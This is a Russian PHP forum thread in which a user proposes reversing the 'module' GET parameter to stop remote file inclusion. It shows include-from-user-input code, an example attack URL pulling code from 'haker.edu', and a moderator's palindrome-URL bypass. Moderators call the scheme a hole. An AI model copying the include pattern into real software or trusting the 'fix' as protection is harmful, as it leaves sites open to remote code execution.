За последние 24 часа нас посетили 22799 программистов и 1221 робот. Сейчас ищет 751 программист ...

Я придумал крутую защиту от PHP-инъекций. Будет работать?

Тема в разделе "Вопросы от блондинок", создана пользователем html-программист, 15 фев 2012.

  1. html-программист

    html-программист Активный пользователь

    С нами с:
    10 фев 2012
    Сообщения:
    831
    Симпатии:
    4
    Адрес:
    Kiev
    Есть скажем, какой-нить php-файл index.php:
    Код (Text):
    1. <?
    2. ...
    3. $module = $_GET['module'];
    4. include ($module.'.php');
    5. ...
    6. ?>
    Так вот, хакер может сделать что-то в духе: http://nasa.gov/index.php?module=http://haker.edu/killsite

    Как этого избежать?

    Код (Text):
    1. <?
    2. ...
    3. $module = $_GET['module'];
    4. $strl=strlen($module);
    5. $polovinastrl=($strl-($strl%2))/2;
    6. for($i=0;$i<$polovinastrl;$i++){
    7.     $module{$i}=$module{$strl-$i-1};
    8. }
    9. include ($module.'.php');
    10. ...
    11. ?>
    Ну и соответственно, все подключаемые файлы надо называть задом-наперед.
    Я не наркоман, если что.
     
  2. Апельсин

    Апельсин Активный пользователь

    С нами с:
    20 мар 2010
    Сообщения:
    3.645
    Симпатии:
    2
    Re: Я придумал крутую защиту от PHP-инъекций. Будет работать

     
  3. AndreJM

    AndreJM Активный пользователь

    С нами с:
    25 янв 2012
    Сообщения:
    522
    Симпатии:
    0
    Re: Я придумал крутую защиту от PHP-инъекций. Будет работать

    Дружище, плевать на file_exists, твой код с модулем взорвал мой моск, а самое главное он очень быстрый.
     
  4. igordata

    igordata Суперстар
    Команда форума Модератор

    С нами с:
    18 мар 2010
    Сообщения:
    32.410
    Симпатии:
    1.768
    Re: Я придумал крутую защиту от PHP-инъекций. Будет работать

    ты дыру придумал, а не защиту
     
  5. html-программист

    html-программист Активный пользователь

    С нами с:
    10 фев 2012
    Сообщения:
    831
    Симпатии:
    4
    Адрес:
    Kiev
    Re: Я придумал крутую защиту от PHP-инъекций. Будет работать

    Не угадал.
     
  6. igordata

    igordata Суперстар
    Команда форума Модератор

    С нами с:
    18 мар 2010
    Сообщения:
    32.410
    Симпатии:
    1.768
    Re: Я придумал крутую защиту от PHP-инъекций. Будет работать

    я не гадаю. =) я констатирую факт.
     
  7. [vs]

    [vs] Суперстар
    Команда форума Модератор

    С нами с:
    27 сен 2007
    Сообщения:
    10.553
    Симпатии:
    631
    Re: Я придумал крутую защиту от PHP-инъекций. Будет работать

    Не сложно подобрать комбинацию, когда имя модуля превратится в http://misyte.ru//ur.etysim//:ptth что позволяет с помощью rewrite выдать нужный скрипт.